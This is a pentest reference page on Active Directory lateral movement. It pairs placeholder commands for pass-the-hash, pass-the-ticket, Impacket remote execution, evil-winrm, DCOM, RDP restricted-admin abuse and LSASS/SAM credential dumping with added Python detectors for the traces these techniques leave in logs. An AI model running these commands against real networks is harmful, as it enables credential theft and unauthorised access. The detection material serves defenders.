
AD Lateral Movement

aka Pass-the-Hash, Pass-the-Ticket, PTH, PSExec, Lateral Movement

Windows lateral movement techniques: Pass-the-Hash (PTH), Pass-the-Ticket (PTT), Overpass-the-Hash, PSExec/smbexec/wmiexec/atexec (Impacket), evil-winrm, DCOM, RDP PTH with Restricted Admin, and CrackMapExec execution.

Ports

Port   Proto  Notes
135    tcp    RPC / DCOM
139    tcp    NetBIOS
445    tcp    SMB — psexec/smbexec
3389   tcp    RDP — restricted admin PTH
5985   tcp    WinRM (HTTP)
5986   tcp    WinRM (HTTPS)

Fingerprint

  • Port 5985/5986 open = WinRM enabled (good evil-winrm target)
  • Any SMB port open with local/domain admin creds = PTH candidate

Key files

Path               Holds                             Sensitive
lsass.exe memory   NT hashes and Kerberos tickets    sensitive
SAM (HKLM\SAM)     local account hashes              sensitive
LSASS minidump     offline analysis with mimikatz    sensitive

Exploitation primitives

  • PTH: authenticate using NT hash directly (no plaintext password needed)
  • PTT: inject existing Kerberos ticket and use Kerberos-aware tools
  • evil-winrm is the cleanest interactive shell over WinRM with hash support
  • wmiexec leaves no file on disk; smbexec avoids creating new services

Pass-the-Hash (PTH)

Use an NT hash in place of a password for authentication over NTLM protocols (SMB, WinRM, RPC).

# nxc — verify PTH works
nxc smb TARGET -u Administrator -H :NTHASH

# evil-winrm (WinRM)
evil-winrm -i TARGET -u Administrator -H NTHASH

# Impacket psexec
psexec.py -hashes :NTHASH 'domain.local/Administrator'@TARGET

# Impacket wmiexec (stealthier — no file upload)
wmiexec.py -hashes :NTHASH 'domain.local/Administrator'@TARGET

# Impacket smbexec (no new service creation)
smbexec.py -hashes :NTHASH 'domain.local/Administrator'@TARGET

# xfreerdp + PTH (Restricted Admin Mode must be enabled on target)
xfreerdp /u:Administrator /pth:NTHASH /d:domain.local /v:TARGET

Pass-the-Ticket (PTT)

Import an existing Kerberos ticket into your session and use Kerberos-enabled tools.

Linux

# Set ticket path
export KRB5CCNAME=/path/to/ticket.ccache

# Use with impacket tools (-k flag skips password/hash)
secretsdump.py -k -no-pass TARGET.domain.local
wmiexec.py -k -no-pass domain.local/user@TARGET
psexec.py -k -no-pass domain.local/user@TARGET

Windows (Rubeus)

# Inject ticket into current logon session
.\Rubeus.exe ptt /ticket:BASE64_TICKET

# Verify
klist

# Use normally (net use, Enter-PSSession, etc.)
dir \\TARGET\C$

Overpass-the-Hash (Pass-the-Key)

Convert an NT hash or AES key into a Kerberos TGT:

# Linux (impacket)
getTGT.py domain.local/user -hashes :NTHASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
wmiexec.py -k -no-pass domain.local/user@TARGET

# With AES256 key (OPSEC: preferred over NT hash — Kerberos only, no NTLM)
getTGT.py domain.local/user -aesKey AES256KEY -dc-ip DC_IP

# Windows — Rubeus
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
.\Rubeus.exe asktgt /user:user /aes256:AES256KEY /ptt
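The OPSEC note above has a defender-side counterpart: a TGT requested from an NT hash arrives at the KDC as an RC4-HMAC request (TicketEncryptionType 0x17 in Event ID 4768), while a TGT from the AES256 key, or from a modern domain-joined Windows client, is requested with AES256 (0x12). The script below is an added example, not part of this page or of Impacket/Rubeus; it audits constructed 4768 records for successful legacy-cipher TGT requests from clients outside an assumed RC4 baseline.

```python
"""Audit Kerberos TGT requests (Windows Event ID 4768) for legacy ciphers.

A TGT obtained from an NT hash (getTGT.py -hashes, Rubeus asktgt /rc4:) is
requested with RC4-HMAC (TicketEncryptionType 0x17); one obtained from the
AES256 key, or by a modern domain-joined Windows client, uses 0x12. Flagging
successful 0x17 requests from hosts not known to need RC4 surfaces
overpass-the-hash attempts. The event records below are constructed for this
example and are not real log data.
"""
from collections import Counter

# Ticket encryption type codes as logged in the 4768 TicketEncryptionType field
ENC_TYPES = {
    0x01: "DES-CBC-CRC",
    0x03: "DES-CBC-MD5",
    0x11: "AES128-CTS-HMAC-SHA1-96",
    0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC",
    0x18: "RC4-HMAC-EXP",
}
LEGACY_TYPES = {0x01, 0x03, 0x17, 0x18}

# Constructed sample records, keyed like the EventData fields of Event 4768.
SAMPLE_4768 = [
    {"TargetUserName": "jdoe", "IpAddress": "::ffff:10.0.1.25",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "jdoe", "IpAddress": "::ffff:10.0.1.25",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "svc_backup", "IpAddress": "::ffff:10.0.9.200",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "svc_backup", "IpAddress": "::ffff:10.0.9.200",
     "TicketEncryptionType": "0x17", "Status": "0x18"},  # pre-auth failed: no ticket issued
    {"TargetUserName": "printsrv$", "IpAddress": "::ffff:10.0.3.7",
     "TicketEncryptionType": "0x17", "Status": "0x0"},   # assumed legacy appliance that still uses RC4
]


def client_ip(event):
    """4768 logs IPv4 clients as IPv4-mapped IPv6; return the plain address."""
    return event["IpAddress"].removeprefix("::ffff:")


def legacy_tgt_requests(events, rc4_baseline=frozenset()):
    """Return successful TGT requests that used a legacy cipher from a client
    not in rc4_baseline (hosts known to still negotiate RC4)."""
    findings = []
    for ev in events:
        if int(ev.get("Status", "0x0"), 0) != 0:
            continue  # KDC rejected the request; nothing was issued
        etype = int(ev["TicketEncryptionType"], 0)
        ip = client_ip(ev)
        if etype in LEGACY_TYPES and ip not in rc4_baseline:
            findings.append({
                "user": ev["TargetUserName"],
                "client": ip,
                "cipher": ENC_TYPES.get(etype, hex(etype)),
            })
    return findings


def cipher_summary(events):
    """Count successful TGT requests per cipher name, for a baseline report."""
    counts = Counter()
    for ev in events:
        if int(ev.get("Status", "0x0"), 0) == 0:
            etype = int(ev["TicketEncryptionType"], 0)
            counts[ENC_TYPES.get(etype, hex(etype))] += 1
    return dict(counts)


if __name__ == "__main__":
    print(cipher_summary(SAMPLE_4768))
    for f in legacy_tgt_requests(SAMPLE_4768, rc4_baseline={"10.0.3.7"}):
        print(f"legacy-cipher TGT for {f['user']} from {f['client']} ({f['cipher']})")
```

Run `cipher_summary` over a few days of 4768 events first to build the RC4 baseline; once the set of hosts that legitimately request RC4 is known, every remaining 0x17 request is worth a look. The AES-key variant of overpass-the-hash is invisible to this rule, which is exactly why the note above prefers it.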

PSExec (Sysinternals / Impacket)

Creates a remote service on the target to execute commands. Noisy — creates Windows event log entries.

# Impacket (Linux)
psexec.py domain.local/Administrator:pass@TARGET
psexec.py -hashes :NTHASH domain.local/Administrator@TARGET

# Sysinternals (Windows)
PsExec.exe \\TARGET -u DOMAIN\Administrator -p pass cmd

# nxc (-x runs a command through the chosen exec method; here smbexec)
nxc smb TARGET -u Administrator -p pass -x "whoami" --exec-method smbexec

wmiexec (no file upload, stealthier)

Uses WMI to spawn processes. Output captured via SMB. No file dropped on target.

# Impacket
wmiexec.py domain.local/Administrator:pass@TARGET
wmiexec.py -hashes :NTHASH domain.local/Administrator@TARGET 'whoami /all'

smbexec (no new service, semi-interactive)

Creates a service per command execution (deletes it after), never writes a binary to disk.

smbexec.py domain.local/Administrator:pass@TARGET
smbexec.py -hashes :NTHASH domain.local/Administrator@TARGET

atexec (Task Scheduler-based)

Uses Windows Task Scheduler to run a command once, retrieve output, delete task.

atexec.py domain.local/Administrator:pass@TARGET whoami
atexec.py -hashes :NTHASH domain.local/Administrator@TARGET 'type C:\Users\Administrator\Desktop\root.txt'

evil-winrm (WinRM Interactive Shell)

Best interactive shell for WinRM targets. Supports PTH, Kerberos, SSL, uploads/downloads.

# Password
evil-winrm -i TARGET -u Administrator -p 'Password123'

# Hash
evil-winrm -i TARGET -u Administrator -H NTHASH

# Kerberos
export KRB5CCNAME=admin.ccache
evil-winrm -i TARGET -u Administrator -r domain.local

# Upload / Download
upload local_file.exe C:\\Temp\\file.exe
download C:\\Temp\\output.txt local_output.txt

# Load PowerShell scripts from local directory
evil-winrm -i TARGET -u user -p pass -s /path/to/scripts/
# Then inside session:
Invoke-BloodHound -CollectionMethod All

WMI (wmic + Invoke-WmiMethod)

# Run command via wmic (Windows)
wmic /node:TARGET /user:DOMAIN\Administrator /password:pass process call create "cmd.exe /c whoami > C:\Temp\out.txt"

# PowerShell
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName TARGET -Credential $cred

RDP (Restricted Admin Mode — PTH via xfreerdp)

Restricted Admin Mode allows PTH for RDP but the session runs without network credentials:

# Check if Restricted Admin Mode is enabled (registry)
# HKLM\System\CurrentControlSet\Control\Lsa — DisableRestrictedAdmin = 0

# Connect with hash
xfreerdp /u:Administrator /pth:NTHASH /d:domain.local /v:TARGET /dynamic-resolution

# Enable Restricted Admin Mode remotely (requires admin access)
nxc smb TARGET -u admin -p pass -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f'
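The sections from PSExec through RDP above each name the trace the method leaves (a new service, a WMI-spawned process, a one-shot scheduled task, a registry change). The script below is an added example, not part of this page or of Impacket/nxc; it classifies constructed Windows event records by those traces. The matching rules are assumptions drawn from each tool's default behaviour (service and output-file names, loopback share redirects), not vendor signatures, and would need tuning against real logs.

```python
"""Classify Windows event records by the lateral-movement artifact they match.

Rules (assumed from each tool's default behaviour; heuristics for this example):
  * 7045 (System log, new service), psexec.py / PsExec: a random-letter or
    PSEXESVC binary dropped into ADMIN$ (%SystemRoot%) and run as a service;
  * 7045, smbexec.py: a service whose ImagePath is %COMSPEC% /Q /c ... with
    output redirected to \\127.0.0.1\<share>\__output;
  * 4688 (process creation), wmiexec.py: cmd.exe /Q /c spawned under
    WmiPrvSE.exe with output sent to \\127.0.0.1\ADMIN$\__<timestamp>;
  * 4698 (scheduled task created), atexec.py: cmd.exe /C ... > %windir%\Temp\<name>.tmp;
  * 4688, reg add ... DisableRestrictedAdmin ... /d 0, which enables
    Restricted Admin Mode and with it RDP pass-the-hash.
The sample events are constructed for this example, not real log data.
"""
import re

LOOPBACK_SHARE = r"\\\\127\.0\.0\.1\\"   # regex for a literal \\127.0.0.1\


def rule_psexec_service(e):
    if e.get("ServiceName", "").upper() == "PSEXESVC":
        return True
    # Impacket psexec.py: random-letter .exe uploaded to ADMIN$, i.e. %SystemRoot%
    return re.fullmatch(r"%systemroot%\\[A-Za-z]{4,12}\.exe",
                        e.get("ImagePath", ""), re.IGNORECASE) is not None


def rule_smbexec_service(e):
    path = e.get("ImagePath", "")
    return ("%COMSPEC% /Q /c" in path
            and re.search(LOOPBACK_SHARE + r"[A-Za-z]+\$\\__output", path) is not None)


def rule_wmiexec_process(e):
    parent = e.get("ParentProcessName", "").lower()
    cmd = e.get("CommandLine", "")
    return (parent.endswith("wmiprvse.exe")
            and re.search(LOOPBACK_SHARE + r"ADMIN\$\\__", cmd) is not None)


def rule_atexec_task(e):
    content = e.get("TaskContent", "")
    return ("<Command>cmd.exe</Command>" in content
            and re.search(r"/C .*\\Temp\\\w+\.tmp", content) is not None)


def rule_restricted_admin_enable(e):
    cmd = e.get("CommandLine", "")
    return re.search(r"\breg(?:\.exe)?\s+add\b.*DisableRestrictedAdmin\b.*\s/d\s+0\b",
                     cmd, re.IGNORECASE) is not None


RULES = [
    ("psexec-service-install", 7045, rule_psexec_service),
    ("smbexec-service", 7045, rule_smbexec_service),
    ("wmiexec-process", 4688, rule_wmiexec_process),
    ("atexec-task", 4698, rule_atexec_task),
    ("restricted-admin-enable", 4688, rule_restricted_admin_enable),
]

# Constructed sample events in the shape of the relevant EventData fields.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
     "AccountName": "LocalSystem"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"EventID": 4698, "TaskName": r"\kDqZfbHu",
     "TaskContent": r"<Exec><Command>cmd.exe</Command><Arguments>/C whoami > %windir%\Temp\QkaeRwiU.tmp 2>&1</Arguments></Exec>"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\reg.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f"},
    {"EventID": 7045, "ServiceName": "Dhcp",   # benign: normal service install
     "ImagePath": r"%SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted",
     "AccountName": r"NT AUTHORITY\LocalService"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",   # benign
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": r"cmd.exe /c dir"},
]


def classify(events):
    """Return (rule_name, event) for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, event_id, pred in RULES:
            if ev.get("EventID") == event_id and pred(ev):
                hits.append((name, ev))
    return hits


if __name__ == "__main__":
    for name, ev in classify(SAMPLE_EVENTS):
        print(f"{name}: event {ev['EventID']}")
```

The two benign records at the end of the sample are there to show the rules do not fire on an ordinary service install or an interactive cmd.exe. The rules key on defaults such as the BTOBTO service name and the `__output` file, which any of these tools can rename, so the 7045/4688/4698 events themselves, not the names, are the durable signal.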

DCOM (Distributed Component Object Model)

Use COM objects for remote execution — less common, useful for evading detections on SMB.

# MMC20.Application DCOM lateral movement
$dcom = [System.Activator]::CreateInstance([System.Type]::GetTypeFromProgID('MMC20.Application', 'TARGET'))
$dcom.Document.ActiveView.ExecuteShellCommand('cmd', $null, '/c whoami > C:\Temp\out.txt', '7')

Credential Dumping on Compromised Host

Once you have local admin on a machine:

# Remote dump via nxc
nxc smb TARGET -u admin -p pass --sam   # SAM hashes
nxc smb TARGET -u admin -p pass --lsa   # LSA secrets
nxc smb TARGET -u admin -p pass -M lsassy  # lsassy module (LSASS dump)

# secretsdump.py
secretsdump.py domain.local/Administrator:pass@TARGET

# Mimikatz (on Windows shell)
sekurlsa::logonpasswords    # plaintext + NT hashes from LSASS
sekurlsa::tickets           # Kerberos tickets
lsadump::sam                # local SAM
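The LSASS-based paths above (the lsassy module, sekurlsa::logonpasswords and sekurlsa::tickets, taking a minidump for offline analysis) all have to open lsass.exe with memory-read rights, which Sysmon records as Event ID 10 with a GrantedAccess mask. The script below is an added example, not part of this page or of any of the tools it lists; it decodes that mask and flags non-allowlisted processes reading LSASS memory. The allowlist, the sample records and the observation that masks such as 0x1010 and 0x1FFFFF are frequently seen from dumping tools are assumptions for the example.

```python
"""Flag handles opened on lsass.exe with memory-read rights (Sysmon Event ID 10).

Reading LSASS memory, whether live (sekurlsa::*) or via a minidump for offline
analysis, requires PROCESS_VM_READ on lsass.exe. Decoding the GrantedAccess
mask and checking the source image against an allowlist of processes that
legitimately touch LSASS turns that into a detection. The allowlist and the
sample records are constructed for this example.
"""
import ntpath

# Process access rights (winnt.h) by bit, used to decode Sysmon's GrantedAccess.
PROCESS_RIGHTS = {
    0x000001: "PROCESS_TERMINATE",
    0x000002: "PROCESS_CREATE_THREAD",
    0x000008: "PROCESS_VM_OPERATION",
    0x000010: "PROCESS_VM_READ",
    0x000020: "PROCESS_VM_WRITE",
    0x000040: "PROCESS_DUP_HANDLE",
    0x000080: "PROCESS_CREATE_PROCESS",
    0x000100: "PROCESS_SET_QUOTA",
    0x000200: "PROCESS_SET_INFORMATION",
    0x000400: "PROCESS_QUERY_INFORMATION",
    0x000800: "PROCESS_SUSPEND_RESUME",
    0x001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x002000: "PROCESS_SET_LIMITED_INFORMATION",
    0x010000: "DELETE",
    0x020000: "READ_CONTROL",
    0x040000: "WRITE_DAC",
    0x080000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE",
}
PROCESS_VM_READ = 0x0010

# Assumed allowlist of image basenames that open LSASS as part of normal operation.
ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe", "svchost.exe"}

# Constructed Sysmon Event 10 records (SourceImage, TargetImage, GrantedAccess).
SAMPLE_EVENT10 = [
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Users\jdoe\Downloads\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Users\jdoe\Downloads\m.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1010"},
]


def decode_access(mask):
    """Return the names of the rights set in a GrantedAccess mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def suspicious_lsass_access(events, allowlist=ALLOWLIST):
    """Return LSASS opens that include PROCESS_VM_READ from a non-allowlisted image."""
    findings = []
    for ev in events:
        if ntpath.basename(ev["TargetImage"]).lower() != "lsass.exe":
            continue
        mask = int(ev["GrantedAccess"], 0)   # Sysmon logs the mask as a hex string
        source = ntpath.basename(ev["SourceImage"])
        if mask & PROCESS_VM_READ and source.lower() not in allowlist:
            findings.append({"source": ev["SourceImage"],
                             "mask": hex(mask),
                             "rights": decode_access(mask)})
    return findings


if __name__ == "__main__":
    for f in suspicious_lsass_access(SAMPLE_EVENT10):
        print(f"{f['source']} opened lsass.exe with {f['mask']}: {', '.join(f['rights'])}")
```

The Task Manager record is flagged on purpose: a right-click "Create dump file" on lsass.exe is a legitimate action that produces the same minidump an attacker wants, so it belongs in triage rather than in the allowlist.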
